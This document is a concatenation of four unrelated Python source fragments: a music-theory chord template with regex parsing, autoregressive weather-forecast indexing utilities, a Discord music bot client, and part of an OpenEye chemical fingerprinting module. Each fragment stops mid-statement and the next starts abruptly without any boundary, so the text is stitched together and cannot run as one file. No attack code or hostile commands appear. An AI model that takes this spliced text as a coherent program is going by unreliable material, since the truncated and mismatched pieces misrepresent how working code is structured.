IntervalType.Diminished), Interval(7, IntervalType.Minor)], TertianChordType.Maj6: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(6, IntervalType.Major)], TertianChordType.Min6: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect), Interval(6, IntervalType.Major)], TertianChordType.Fr: [Interval(6, IntervalType.Augmented), Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(4, IntervalType.Augmented)], TertianChordType.Ger: [Interval(6, IntervalType.Augmented), Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(4, IntervalType.Augmented)], TertianChordType.It: [Interval(6, IntervalType.Augmented), Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Augmented)], TertianChordType.N6: [Interval(6, IntervalType.Minor), Interval(2, IntervalType.Minor), Interval(4, IntervalType.Perfect)], } # Note that augmented 6th chords and the neopolitan have the sixth as the root. This is the normal position. # And inversions specified alter that order. So, root position would be inversion == 2. GROUP_BASIS = 'Basis' GROUP_BASIS_TAG = '?P<' + GROUP_BASIS + '>' P1_BASIS = '(' + GROUP_BASIS_TAG + 'T|t)?' SCALE_DEGREE = 'III|II|IV|VII|VI|V|I|iii|ii|iv|vii|vi|v|i' GROUP_SCALE_DEGREE = 'ScaleDegree' GROUP_SCALE_DEGREE_TAG = '?P<' + GROUP_SCALE_DEGREE + '>' GROUP_DIATONIC_TONE = 'DiatonicTone' GROUP_DIATONIC_TONE_NAME = '?P<' + GROUP_DIATONIC_TONE + '>' ROOT = '((' + GROUP_DIATONIC_TONE_NAME + DiatonicTone.DIATONIC_PATTERN_STRING + ')|' + \ '(' + GROUP_SCALE_DEGREE_TAG + SCALE_DEGREE + '))' TENSION_RANGE = '(10|11|12|13|14|15|9|8|7|6|5|4|3|2|1)' TENSION = '((\+)' + '(bb|b|##|#)?' + TENSION_RANGE + ')' GROUP_TENSIONS = 'Tensions' GROUP_TENSIONS_TAG = '?P<' + GROUP_TENSIONS + '>' TERTIAN_TENSIONS = '(' + GROUP_TENSIONS_TAG + TENSION + '*)' CHORD_NAMES = 'Maj7Sus4|Maj7Sus2|Maj7Sus|Maj7|MajSus4|MajSus2|MajSus|Maj6|Maj|Min7|MinMaj7|Min6|Min|DimMaj7|' \ 'Dom7Flat5|Dim7|Dim|AugMaj7|Aug7|Aug|Dom7Sus4|Dom7Sus2|Dom7Sus|Dom7|HalfDim7|Fr|Ger|It|N6' GROUP_CHORD = 'Chord' GROUP_CHORD_TAG = '?P<' + GROUP_CHORD + '>' CHORDS = '(' + GROUP_CHORD_TAG + CHORD_NAMES + ')?' INVERSION = '[1-7]' GROUP_INVERSION = 'Inversion' GROUP_INVERSION_TAG = '?P<' + GROUP_INVERSION + '>' # INVERSIONS = '(\@(' + GROUP_INVERSION_TAG + INVERSION + '))?' INVERSION_TENSION = 'InvTension' INVERSION_TENSION_TAG = '?P<' + INVERSION_TENSION + '>' INVERSION_TENSION_STRUCT = '\(' + '(bb|b|##|#)?' + TENSION_RANGE + '\)' INVERSION_TENSION_PATTERN = '(' + INVERSION_TENSION_TAG + INVERSION_TENSION_STRUCT + ')' INVERSIONS = '(\@(' + GROUP_INVERSION_TAG + INVERSION + '|' + INVERSION_TENSION_PATTERN + '))?' # full parse string and accompanying pattern for the tertian chord grammar. TERTIAN_PARSE_STRING = P1_BASIS + ROOT + CHORDS + TERTIAN_TENSIONS + INVERSIONS + '$' TERTIAN_PATTERN = re.compile(TERTIAN_PARSE_STRING) TENSION_PATTERN = re.compile(TENSION) INVERSE_TENSION_PATTERN = re.compile(INVERSION_TENSION_STRUCT) def __init__(self, diatonic_basis, scale_degree, chord_type, tension_intervals, inversion, inversion_interval=None): """ Constructor Args: diatonic_basis: DiatonicTone used as root of chord, e.g. C major chord, the C part scale_degree: int version of roman numeral chord_type: The chord type ala TertianChordType tension_intervals: list of Interval's comprising the tensions inversion: int for which of the chord tones (ordinal) serves as root [origin 1] inversion_interval: if specified, indicates which interval should be the base. (both this in interval cannot be non-null.) """ ChordTemplate.__init__(self) self.__diatonic_basis = diatonic_basis # DiatonicTone self.__scale_degree = scale_degree self.__chord_type = chord_type self.__tension_intervals = tension_intervals # list of [number, augmentation] representing intervals self.__inversion = inversion # which tone of n is the bass self.__inversion_interval = inversion_interval self.__base_intervals = [] if chord_type: self.__base_intervals.extend(TertianChordTemplate.TERTIAN_CHORD_TYPE_MAP[self.chord_type.value]) # Remove duplicate tensions seen = set() seen_add = seen.add deduped_tension_intervals = [tension for tension in self.tension_intervals if not (tension.semitones() in seen or seen_add(tension.semitones()))] self.__tension_intervals = deduped_tension_intervals # Inversion check - only if chord type was given, not for cases like II if self.chord_type and (self.inversion
<reponame>deepsphere/deepsphere-weather<filename>modules/utils_autoregressive.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Jan 15 17:00:54 2021 @author: ghiggi """ import numpy as np import matplotlib.pyplot as plt #-----------------------------------------------------------------------------. ###################### ### Miscellaneous #### ###################### def is_sorted_array(arr, increasing=True): """Check the array is sorted.""" # If only 1 if len(arr) == 0: return True # If multiple values if increasing: return np.all(np.diff(arr) >= 0) else: return np.all(np.diff(arr) <= 0) def is_number(x): """Check is a number.""" if isinstance(x, (int, float)): return True else: return False def is_natural_number(x): """Check is a natural number.""" if not is_number(x): return False else: if isinstance(x, int): return True elif isinstance(x, float): return x.is_integer() else: raise ValueError("Error. Not covered all number types") #-----------------------------------------------------------------------------. ############################### ### First and last indices #### ############################### def get_first_valid_idx(input_k): """Provide the first available index for training, once accounted the past timesteps required.""" past_idxs = input_k[input_k < 0] if past_idxs.size == 0: # empty past_idxs = 0 else: past_idxs = abs(min(past_idxs)) return past_idxs def get_last_valid_idx(output_k, forecast_cycle, ar_iterations): """Provide the last available index for training, once accounted for all forecasted timesteps.""" future_idxs = output_k[output_k >= 0] if future_idxs.size == 0: # empty future_idxs = 0 else: future_idxs = abs(max(future_idxs)) return ar_iterations*forecast_cycle + future_idxs #-----------------------------------------------------------------------------. ############################################## ### Indexing dictionaries for AR training #### ############################################## # - X and Y dictionary are relative to idx_start=0 def get_idx_lag(idx_start, ar_iteration, forecast_cycle, input_k): """Provide the indices of past predictors.""" return idx_start + (forecast_cycle*ar_iteration) + input_k def get_idx_forecast(idx_start, ar_iteration, forecast_cycle, output_k): """Provide the indices of the forecasts.""" return idx_start + (forecast_cycle*ar_iteration) + output_k def get_dict_Y(ar_iterations, forecast_cycle, output_k): """Provide information to load the labels required by an AR model.""" dict_Y = {} for i in range(ar_iterations+1): dict_Y[i] = get_idx_forecast(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, output_k=output_k) return dict_Y def get_dict_X_dynamic(ar_iterations, forecast_cycle, input_k): """Provide information to load the dynamic data required by an AR model.""" dict_X_past = {} for i in range(ar_iterations+1): idxs = get_idx_lag(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, input_k=input_k) idxs_past_data = idxs[idxs < 0] # Indexes of past data if (idxs_past_data.size == 0): dict_X_past[i] = None else: dict_X_past[i] = idxs_past_data return dict_X_past def get_dict_X_bc(ar_iterations, forecast_cycle, input_k): """Provide information to load the boundary conditions data required by an AR model.""" dict_X_bc = {} for i in range(ar_iterations+1): dict_X_bc[i] = get_idx_lag(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, input_k=input_k) return dict_X_bc def get_dict_stack_info(ar_iterations, forecast_cycle, input_k, output_k, stack_most_recent_prediction = True): """Provide the information required to stack the iterative predictions of an AR model.""" input_k = check_input_k(input_k, ar_iterations) output_k = check_output_k(output_k) # Compute index of Y labels dict_Y = {} for i in range(ar_iterations+1): dict_Y[i] = get_idx_forecast(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, output_k=output_k) # Compute index of future X that need to be stacked from previous predicted Y dict_X_future = {} for i in range(ar_iterations+1): idxs = get_idx_lag(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, input_k=input_k) idxs_future_data = idxs[idxs >= 0] if (idxs_future_data.size == 0): dict_X_future[i] = None else: dict_X_future[i] = idxs_future_data ##------------------------------------------------------------------------. # - Define an index to choose which of the previous available prediction to take if stack_most_recent_prediction: idx_to_select = -1 # take the last available prediction performed else: idx_to_select = 0 # take the first available prediction performed ##------------------------------------------------------------------------. # - Retrieve leadtime and time index of Y that need to be stacked to X dict_Y_to_stack = {} try: for i, idx_X_future in dict_X_future.items(): if idx_X_future is None: dict_Y_to_stack[i] = None else: l_tuple_idx = [] # Search for each X_future_index, the leadtime and tensor index from which to take the data for idx in idx_X_future: # Search only in Y data already predicted -> range(i) and not range(i+1) # - Return a list of tuples [(L0, idx) of possible solutions l_solutions = [(j, np.argwhere(dict_Y[j] == idx).tolist()[0][0]) for j in range(i) if idx in dict_Y[j] ] # - Select first or last based on 'stack_most_recent_prediction' option l_tuple_idx.append(l_solutions[idx_to_select]) # Add to the dictionary dict_Y_to_stack[i] = l_tuple_idx except IndexError: raise ValueError("Review the AR settings. AR training is not possible with the current configuration!") ##------------------------------------------------------------------------. # - Construct dictionary specifying when to remove predicted Y (from GPU) dict_Y_to_remove = {} idx_arr_removed = np.array([]) # Initialize # Start looping from the last forecast iteration (to the first) for i in range(ar_iterations+1)[::-1]: l_tuple = dict_Y_to_stack[i] # Skip leadtime when no Y data to stack if l_tuple is None: dict_Y_to_remove[i] = None else: # Retrieve required leadtime at given forecast iteration leadtime_arr = np.array([tuple2[0] for tuple2 in l_tuple]) # Select the one can be deleted leadtime_arr = leadtime_arr[np.isin(leadtime_arr, idx_arr_removed, invert=True)] if leadtime_arr.size == 0: dict_Y_to_remove[i] = None else: dict_Y_to_remove[i] = leadtime_arr.tolist() # Update idx_arr_removed idx_arr_removed = np.append(idx_arr_removed, leadtime_arr) return (dict_Y_to_stack, dict_Y_to_remove) #-----------------------------------------------------------------------------. ############### ### Checks #### ############### def check_input_k(input_k, ar_iterations): """Check validity of 'input_k' argument.""" if isinstance(input_k, list): input_k = np.array(input_k) # Check indexing is sorted increasingly if not is_sorted_array(input_k, increasing=True): raise ValueError("Provide input_k sorted increasingly") # Checks for forecasting mode if ar_iterations > 0: if np.any(input_k == 0): raise ValueError("input_k contains values equal to 0. Past timesteps must be specified with negative values") if np.all(input_k > 0): raise ValueError("input_k requires negative values in 'forecasting' mode") return input_k def check_output_k(output_k): """Check validity of 'output_k' argument.""" if isinstance(output_k, list): output_k = np.array(output_k) # Check indexing is sorted increasingly if not is_sorted_array(output_k, increasing=True): raise ValueError("Provide output_k sorted increasingly") # Check output_k contains at least a 0 if not np.any(output_k == 0): raise ValueError("output_k must start with a 0 value. 0 indicates the 'current' timestep to predict.") return output_k def check_ar_iterations(ar_iterations): """Check validity of 'ar_iterations' argument.""" if not is_number(ar_iterations): raise TypeError("'ar_iterations' must be a single integer number") if not is_natural_number(ar_iterations): raise ValueError("'ar_iterations' must be a positive integer value") if ar_iterations < 0: raise ValueError("'ar_iterations' must be a positive integer value") if ar_iterations >= 1: print(' - Autoregressive training with %d AR iterations --> Specified.'% ar_iterations) ar_iterations = int(ar_iterations) return ar_iterations def check_forecast_cycle(forecast_cycle, ar_iterations): """Check validity of 'forecast_cycle' argument.""" if not is_number(ar_iterations): raise TypeError("'ar_iterations' must be a single integer number") if not is_natural_number(forecast_cycle): raise ValueError("'forecast_cycle' must be a positive integer value") if forecast_cycle < 1: raise ValueError("'forecast_cycle' must be equal or longer than 1") if forecast_cycle >= 1: print(' - Forecast cycle of %d --> Specified.'% forecast_cycle) forecast_cycle = int(forecast_cycle) return forecast_cycle def check_ar_settings(input_k, output_k, forecast_cycle, ar_iterations, stack_most_recent_prediction): """Check that AR settings arguments are valid.""" input_k = check_input_k(input_k=input_k, ar_iterations=ar_iterations) output_k = check_output_k(output_k=output_k) ar_iterations = check_ar_iterations(ar_iterations=ar_iterations) forecast_cycle = check_forecast_cycle(forecast_cycle=forecast_cycle, ar_iterations=ar_iterations) ##------------------------------------------------------------------------. # Check autoregressive training is feasible if ar_iterations >= 1: dict_Y_to_stack, _ = get_dict_stack_info(ar_iterations=ar_iterations, forecast_cycle=forecast_cycle, input_k=input_k, output_k=output_k, stack_most_recent_prediction = stack_most_recent_prediction) # if ar_iterations >= 1: # idxs_lag_0 = get_idx_lag(idx_start=0, ar_iteration=0, forecast_cycle=forecast_cycle, input_k=input_k) # idxs_forecasted_0 = get_idx_forecast(idx_start=0, ar_iteration=0, forecast_cycle=forecast_cycle, output_k=output_k) # idxs_lag_1 = get_idx_lag(idx_start=0, ar_iteration=1, forecast_cycle=forecast_cycle, input_k=input_k) # # idxs_forecasted_1 = get_idx_forecast(idx_start=0, ar_iteration=1, forecast_cycle=forecast_cycle, output_k=output_k) # idxs_available = np.concatenate((idxs_lag_0, idxs_forecasted_0)) # if np.any([v not in idxs_available for v in idxs_lag_1]): # raise ValueError("Review the autoregressive settings. Autoregressive training is not allowed with the current configuration!") ##------------------------------------------------------------------------. #-----------------------------------------------------------------------------. ############################## ### Plot AR configuration #### ############################## def _arr_window_info(input_k, output_k, forecast_cycle, ar_iterations, past_margin=0, future_margin=0): """Retrieve information of the data temporal window required for 1 training loop.""" past_idxs = past_margin + get_first_valid_idx(input_k=input_k) future_idxs = future_margin + get_last_valid_idx(output_k=output_k, forecast_cycle=forecast_cycle, ar_iterations=ar_iterations) idx_t_0 = past_idxs width = idx_t_0 + future_idxs + 1 height = ar_iterations + 1 return idx_t_0, width, height def plot_ar_settings(input_k, output_k, forecast_cycle, ar_iterations, stack_most_recent_prediction=True, past_margin=0, future_margin=0, hatch=True): """Plot the model AR configuration.""" ##------------------------------------------------------------------------. # Create forecast temporal data window idx_start, width, height = _arr_window_info(input_k=input_k, output_k=output_k, forecast_cycle=forecast_cycle, ar_iterations=ar_iterations, past_margin=past_margin, future_margin=future_margin) arr = np.zeros(shape = (height, width)) ##------------------------------------------------------------------------. # Create hatching array (only for forecasting mode) if ((ar_iterations >= 1) and hatch): hatch_arr = np.zeros(shape = (height, width)) dict_Y_to_stack, _ = get_dict_stack_info(ar_iterations=ar_iterations, forecast_cycle=forecast_cycle, input_k=input_k, output_k=output_k, stack_most_recent_prediction = stack_most_recent_prediction) dict_Y = get_dict_Y(ar_iterations=ar_iterations, forecast_cycle=forecast_cycle, output_k=output_k) for
import discord import inspect import aiohttp import re import threading import config import datetime as dt from .player import Player from .discord_server import Server from .utils import Utils from threading import Timer from discord_components import ( Button, ButtonStyle, DiscordComponents ) class Client(discord.Client): def __init__(self): intents = discord.Intents().default() intents.members = True super().__init__(intents=intents) # self.intents=intents self.aiosession = aiohttp.ClientSession(loop=self.loop) self.players = {} self.utils = Utils() async def get_voice_client(self, channel): if isinstance(channel, discord.Object): channel = self.get_channel(channel.id) if not isinstance(channel, discord.VoiceChannel): return if channel.guild.voice_client: return channel.guild.voice_client else: return await channel.connect(timeout=60, reconnect=True) async def get_player(self, channel) -> Player: guild = channel.guild if guild.id not in self.players: voice_client = await self.get_voice_client(channel) server = Server(guild) self._clear_queue(guild) player = Player(self, voice_client, server, self.utils) self.players[guild.id] = player return self.players[guild.id] def get_player_in(self, guild: discord.Guild) -> Player: return self.players.get(guild.id) async def on_ready(self): DiscordComponents(self) print(f'{self.user.name} has connected to Discord!') def afk_leave_channel(self, channel, player): if len(channel.members) == 1: self.loop.create_task(self.cmd_leave(channel, player)) async def on_voice_state_update(self, member, before, after): if before.channel and not after.channel and member.name != self.user.name: if len(before.channel.members) == 1: t = Timer(30, self.afk_leave_channel, [ before.channel, self.players[before.channel.guild.id]]) t.start() return if member.name == self.user.name and before.channel and not after.channel: player = self.get_player_in(before.channel.guild) if player: await player.stop() await player.disconnect(disconnected=True) if before.channel.guild.id in self.players: del self.players[before.channel.guild.id] async def on_message(self, message): await self.wait_until_ready() message_content = message.content.strip() if not message_content.startswith(config.PREFIX): return if message.author == self.user: return command, *args = message_content.split(' ') command = command[len(config.PREFIX):].lower( ).strip() # Rimuove il prefix dal comando handler = getattr(self, 'cmd_' + command, None) if handler: argspec = inspect.signature(handler) params = argspec.parameters.copy() handler_kwargs = {} if params.pop('message', None): handler_kwargs['message'] = message if params.pop('channel', None): handler_kwargs['channel'] = message.channel if params.pop('author', None): handler_kwargs['author'] = message.author if params.pop('guild', None): handler_kwargs['guild'] = message.guild if params.pop('player', None): if message.author.voice: handler_kwargs['player'] = await self.get_player(message.author.voice.channel) else: embed = discord.Embed( description=":warning: You have to be connected to a voice channel before you can use this command!", color=discord.Color.orange()) embed.set_footer(text="*Groovy 2.0 Reborn - Gumu#8447 & Ricc#8178", icon_url="https://morethantech.it/images/publications/222/2020122220219.png") await message.channel.send(embed=embed) return if params.pop('_player', None): handler_kwargs['_player'] = self.get_player_in(message.guild) if params.pop('voice_channel', None): handler_kwargs['voice_channel'] = message.guild.me.voice.channel if message.guild.me.voice else None if params.pop('args', None): handler_kwargs['args'] = args await handler(**handler_kwargs) async def cmd_play(self, message, player, channel, author, args): if player.current_radio: player.turn_radio_off() if not args: player.resume(channel) return link = args[0] if re.search("https:\/\/www\.youtube\.com\/watch\?v=.+", link): track = self.utils.get_youtube_metadata(link) if not track: await self._send_video_not_found_message(channel, link) return track = self._load_track(track, player, author.id) self.utils.search_url(track) elif re.search("https:\/\/open\.spotify\.com\/", link): spotify_response = self.utils.get_spotify_metadata(link) if "tracks" in spotify_response: tracks_list = spotify_response["tracks"] if "items" in tracks_list: tracks_list = tracks_list["items"] else: tracks_list = [spotify_response] first_track = tracks_list.pop(0) if "track" in first_track: first_track = first_track["track"] query = "{title} - {artists}".format( title=first_track["name"], artists=" ".join([artist["name"] for artist in first_track["artists"]]) ) youtube_track_id = self.utils.get_youtube_video(query) track = self.utils.get_youtube_metadata( f"https://www.youtube.com/watch?v={youtube_track_id}") if not track: track = { "title": first_track["name"], "artist": first_track["artists"][0]["name"], "isrc": first_track["external_ids"]["isrc"] if "external_ids" in first_track else None, "duration": first_track["duration_ms"] // 1000, "spotify_link": first_track["external_urls"]["spotify"] if first_track["external_urls"] else None } else: track["title"] = first_track["name"] track["artist"] = first_track["artists"][0]["name"] if "external_ids" in first_track: track["isrc"] = first_track["external_ids"]["isrc"] if first_track["external_urls"]: track["spotify_link"] = first_track["external_urls"]["spotify"] track = self._load_track(track, player, author.id) self.utils.search_url(track) if tracks_list: add_tracks = threading.Thread( target=self.add_spotify_tracks, args=(tracks_list, player, message, link)) add_tracks.start() else: youtube_track_id = self.utils.get_youtube_video(" ".join(args)) track = self.utils.get_youtube_metadata( f"https://www.youtube.com/watch?v={youtube_track_id}") if not track: await self._send_video_not_found_message(channel, " ".join(args)) return track = self._load_track(track, player, author.id) self.utils.search_url(track) player.play(channel) async def cmd_unpause(self, message, player): if not player.current_radio: player.resume() async def cmd_pause(self, message, player): if not player.current_radio: await message.add_reaction("⏸") player.pause() async def cmd_stop(self, message, player): # if not player.current_radio: await message.add_reaction("⏹") await player.stop() async def cmd_skip(self, message, player): await message.add_reaction("⏭") player.skip() async def cmd_next(self, message, player): await self.cmd_skip(message, player) async def cmd_back(self, message, player): await message.add_reaction("⏮") player.back() async def cmd_loop(self, message, player): if not player.current_radio: await message.add_reaction("🔂") player.track_loop(True) async def cmd_unloop(self, message, player): if not player.current_radio: await message.add_reaction("👌") player.track_loop(False) async def cmd_leave(self, channel, player, message=None): await self.cmd_clear(channel, player, message) await player.disconnect() del self.players[channel.guild.id] async def cmd_arrivederciiii(self, channel, player, message): await self.cmd_leave(channel, player, message) def _clear_queue(self, guild): server = Server(guild) tracks = server.get_queue() for track in tracks: server.delete_track(track.position) server.set_value({ "index": 0 }) async def cmd_clear(self, channel, player, message=None): self._clear_queue(channel.guild) if player: await player.stop() if message: await message.add_reaction("👌") def add_spotify_tracks(self, tracks_list, player, message, link): player.send_queued_tracks_message(len(tracks_list), link, message) for spotify_track in tracks_list: if "track" in spotify_track: spotify_track = spotify_track["track"] if not spotify_track: continue query = "{title} - {artists}".format( title=spotify_track["name"], artists=" ".join([artist["name"] for artist in spotify_track["artists"]]) ) youtube_track_id = self.utils.get_youtube_video(query) track = self.utils.get_youtube_metadata( f"https://www.youtube.com/watch?v={youtube_track_id}") if not track: track = { "title": spotify_track["name"], "artist": spotify_track["artists"][0]["name"], "isrc": spotify_track["external_ids"]["isrc"] if "external_ids" in spotify_track else None, "duration": spotify_track["duration_ms"] // 1000, "spotify_link": spotify_track["external_urls"]["spotify"] if spotify_track["external_urls"] else None } else: track["title"] = spotify_track["name"] if "external_ids" in spotify_track: track["isrc"] = spotify_track["external_ids"]["isrc"] track["artist"] = spotify_track["artists"][0]["name"] if spotify_track["external_urls"]: track["spotify_link"] = spotify_track["external_urls"]["spotify"] track = self._load_track(track, player, message.author.id) threading.Thread(target=self.utils.search_url, args=(track,)).start() def _load_track(self, track, player, user_id): track["position"] = len(player.server.get_queue()) track["added_by"] = str(user_id) track["DiscordServerID"] = player.server.id player.server.load_track(track) track = player.server.get_queue()[-1] return track async def cmd_queue(self, message, channel, author, player, start_index=None, interaction=None): if hasattr(player, "current_entry") and not player._current_entry: embed = discord.Embed( title="🎶 Queue", description="*The queue is empty*", color=discord.Color.green() ) if not interaction: await channel.send(embed=embed) else: await interaction.edit_origin(embed=embed) return embed = discord.Embed( title=f"🎶 Queue", color=discord.Color.green() ) if not player.is_stopped and not player.is_dead: playing_track = player._current_entry track_text = ( "**[{title}]({link})**".format( title=playing_track.title, link=playing_track.spotify_link if playing_track.spotify_link else playing_track.youtube_link, ) ) artist_text = ( "{artist}" .format( artist = playing_track.artist ) ) duration_text = ( "{time_elapsed} / {duration}" .format( time_elapsed=str(dt.timedelta(seconds=(player._current_player._player.loops * 20) // 1000)), duration=str(dt.timedelta(seconds=playing_track.duration)) ) ) embed.add_field( name="Now Playing", value=track_text, inline=True ) embed.add_field( name="Artist", value=artist_text, inline=True ) embed.add_field( name="Time Elapsed/Duration", value=duration_text, inline=True ) if not start_index: start_index = player._track_index queue = player.server.get_queue() trim_queue = queue[start_index + 1 : start_index + 11] if trim_queue: titles_text = "" artists_text = "" durations_text = "" for track in trim_queue: title = track.title if not len(track.title) <= 30: title = track.title[:27] + "..." titles_text += ( "{i})\t**[{title}]({link})**\n" .format( i=track.position - player._track_index, title=track.title, link=track.spotify_link if track.spotify_link else track.youtube_link ) ) artists_text += ( "{artist}\n" .format( artist = track.artist ) ) durations_text += "*{duration}*\n".format( duration=str(dt.timedelta(seconds=track.duration)) ) embed.add_field( name="Queued Tracks", value=titles_text, inline=True ) embed.add_field( name="Artist", value=artists_text, inline=True ) embed.add_field( name="Duration", value=durations_text, inline=True ) elif not embed.fields: embed = discord.Embed( title="🎶 Queue", description="*The queue is empty*", color=discord.Color.green() ) async def _next_queue_page(interaction): await self.cmd_queue(message, channel, author, player, start_index=int(float(interaction.custom_id) // 1), interaction=interaction) if not trim_queue: components = None else: components = [[ self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="⏪", custom_id=str(player._track_index + 0.1), disabled=(start_index - 10) < player._track_index ), _next_queue_page ), self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="⬅", custom_id=str(start_index - 10), disabled=(start_index - 10) < player._track_index ), _next_queue_page ), self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="➡", custom_id=str(start_index + 10), disabled=(start_index + 10) >= len(queue) ), _next_queue_page ), self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="⏩", custom_id=str(len(queue) // 10 * 10 + player._track_index + 0.1), disabled=(start_index + 10) >= len(queue) ), _next_queue_page ), ]] if not interaction: await channel.send(embed=embed, components=components) else: await interaction.edit_origin(embed=embed, components=components) return async def cmd_info(self, channel, player): ''' Send the song's info ''' if player.current_radio: return current_player = player._current_player queue = player.server.get_queue() track_index = player.server.get().index if current_player and len(queue) > track_index: track = queue[track_index] track_loops = current_player._player.loops + player._source_loops time_elapsed = (track_loops * 20) // 1000 blocks = (20 * time_elapsed) // track.duration status_play_bar = "[" total_blocks = 20 for _ in range(blocks): status_play_bar += '▬' total_blocks -= 1 status_play_bar += "🔘]({link})".format(link=track.spotify_link if track.spotify_link else track.youtube_link) for _ in range(total_blocks): status_play_bar += "▬" embed = discord.Embed(title=f":headphones: {track.title}", description=f"**{status_play_bar}**" , color=discord.Color.green()) embed.add_field(name=":alarm_clock: Track duration", value=str( dt.timedelta(seconds=track.duration))) embed.add_field(name=":hourglass: Time elapsed", value=str( dt.timedelta(seconds=time_elapsed))) embed.set_footer(text="Groovy 2.0 Reborn - Gumu#8447 & Ricc#8178", icon_url="https://morethantech.it/images/publications/222/2020122220219.png") await channel.send(embed=embed) else: embed = discord.Embed( title=":warning: **No song is playing!**", description="Play a song in order to see all informations", color=discord.Color.orange() ) await channel.send(embed=embed) async def cmd_shuffle(self, message, channel, player): if player.current_radio: return if player.shuffle(): await message.add_reaction("🔀") else: embed = discord.Embed( title=":warning: **There are no songs in queue**", description="Play some songs to shuffle them", color=discord.Color.orange() ) await channel.send(embed=embed) async def cmd_fastforward(self, message, player, channel, args): if player.current_radio: return sec = 10 if args: try: sec = int(args[0]) except ValueError: pass player.fastforward(sec=sec) await message.add_reaction("⏩") async def _send_video_not_found_message(self, channel, asked_video):
"""Create OpenEye fingerprints """ # Copyright (c) 2010 <NAME> Scientific, AB (Gothenburg, Sweden) # Licensed under "the MIT license" # See the contents of COPYING or "__init__.py" for full license details. from __future__ import absolute_import import sys import os import errno import ctypes import warnings import errno from openeye.oechem import * from openeye.oegraphsim import * from . import ParseError from . import types from . import io from . import error_handlers from . import argparse __all__ = ["read_structures", "get_path_fingerprinter", "get_maccs_fingerprinter"] class UnknownFormat(KeyError): def __str__(self): return "Unknown format %r" % (self.args[0],) ############# Used when generate the FPS header SOFTWARE = "OEGraphSim/%(release)s (%(version)s)" % dict( release = OEGraphSimGetRelease(), version = OEGraphSimGetVersion()) ##### Handle the atom and bond type flags for path fingerprints # The atom and bond type flags can be specified on the command-line # # --atype=DefaultAtom --btype=BondOrder,InRing # --atype AtomicNumber,InRing --btype DefaultBond,InRing # # The type fields may be separated by either a "," or a "|". # The relevant OpenEye function (OEGetFPAtomType() and # OEGetFPBondType()) use a "|" but that requires escaping for # the shell, so I support "," as well. # There's another conversion of the integer type values into a string # representation, used when generating the canonical form of the # generation parameters for the FPS output. That case uses "|" # (and not ",") and omits the DefaultAtom and DefaultBond name. # The result is easier to parse with the OpenEye API functions. _atype_flags = [(OEGetFPAtomType(atype), atype) for atype in (OEFPAtomType_Aromaticity, OEFPAtomType_AtomicNumber, OEFPAtomType_Chiral, OEFPAtomType_EqAromatic, OEFPAtomType_EqHalogen, OEFPAtomType_FormalCharge, OEFPAtomType_HvyDegree, OEFPAtomType_Hybridization, OEFPAtomType_InRing)] _btype_flags = [(OEGetFPBondType(btype), btype) for btype in (OEFPBondType_BondOrder, OEFPBondType_Chiral, OEFPBondType_InRing)] _atypes = dict(_atype_flags) _btypes = dict(_btype_flags) # I support the DefaultAtom and DefaultBond values but I'm worried # that OpenEye will change the composition of those in the future. I # talked with <NAME> and she says that that won't change, but # I don't necessarily trust future maintainers. To minimize problems, # I'll hard-code them the current Default* values. _atype_flags.insert(0, ("DefaultAtom", 191)) _atypes["DefaultAtom"] = 191 # OEFPAtomType_DefaultAtom _btype_flags.insert(0, ("DefaultBond", 3)) _btypes["DefaultBond"] = 3 # OEFPBondType_DefaultBond ## Go from a "," or "|" separated text field to an integer value # Removes extra whitespace, but none should be present. def _get_type_value(a_or_b, table, description): value = 0 # Allow both "|" and "," as separators # (Consistent with OEChem) description = description.replace("|", ",") for word in description.split(","): word = word.strip() try: value |= table[word] except KeyError: if not word: raise ValueError("Missing %s flag" % (a_or_b,)) raise ValueError("Unknown %s type %r" % (a_or_b, word)) return value def atom_description_to_value(description): """atom_description_to_value(description) -> integer Convert an atom description like FormalCharge,EqHalogen or FormalCharge|EqHalogen into its atom type value. This is similar to OEGetFPAtomType except both "|" and "," are allowed seperators and "AtomDefault" is an allowed term. """ return _get_type_value("atom", _atypes, description) def bond_description_to_value(description): """bond_description_to_value(description) -> integer Convert an bond description like BondOrder,Chiral or BondOrder|Chiral into its bond type value. This is similar to OEGetFPBondType except both "|" and "," are allowed seperators and "BondDefault" is an allowed term. """ return _get_type_value("bond", _btypes, description) ## Go from an integer value into a canonical description # I could use OEGetFPAtomType() and OEGetFPBondType() but I wanted # something which has a fixed sort order even for future releases, # which isn't part of those functions. def _get_type_description(a_or_b, flags, value): words = [] for (word, flag) in flags: if flag & value == flag: # After over 12 years of full-time use of Python, # I finally have a chance to use the xor operator. value = value ^ flag words.append(word) if value != 0: raise AssertionError("Unsupported %s value" % (a_or_b,)) return "|".join(words) def atom_value_to_description(value): """atom_value_to_description(value) -> string Convert from an atom type string into its text description, separated by "|"s. The result are compatible with OEGetFPAtomType and are in canonical order. """ return _get_type_description("atom", _atype_flags, value) def bond_value_to_description(value): """bond_value_to_description(value) -> string Convert from a bond type string into its text description, separated by "|"s. The result are compatible with OEGetFPBontType and are in canonical order. """ return _get_type_description("bond", _btype_flags, value) def decode_path_parameters(parameters): fingerprinter_kwargs = _maccs_defaults.copy() for name, value in parameters: if name not in _maccs_decoders: raise ValueError("Unknown OpenEye-Path parameter %r" % (name,)) decoder = _maccs_decoders[name] fingerprinter_kwargs[name] = decoder(value) return fingerprinter_kwargs _maccs_encoders = {"numbits": str, "minbonds": str, "maxbonds": str, "atype": atom_value_to_description, "btype": bond_value_to_description} def encode_path_parameters(fingerprinter_kwargs): assert len(fingerprinter_kwargs) == len(_maccs_encoders) parameters = {} for name, encoder in _maccs_encoders.items(): value = fingerprinter_kwargs[name] parameters[name] = encoder(value) return parameters ##### Create a 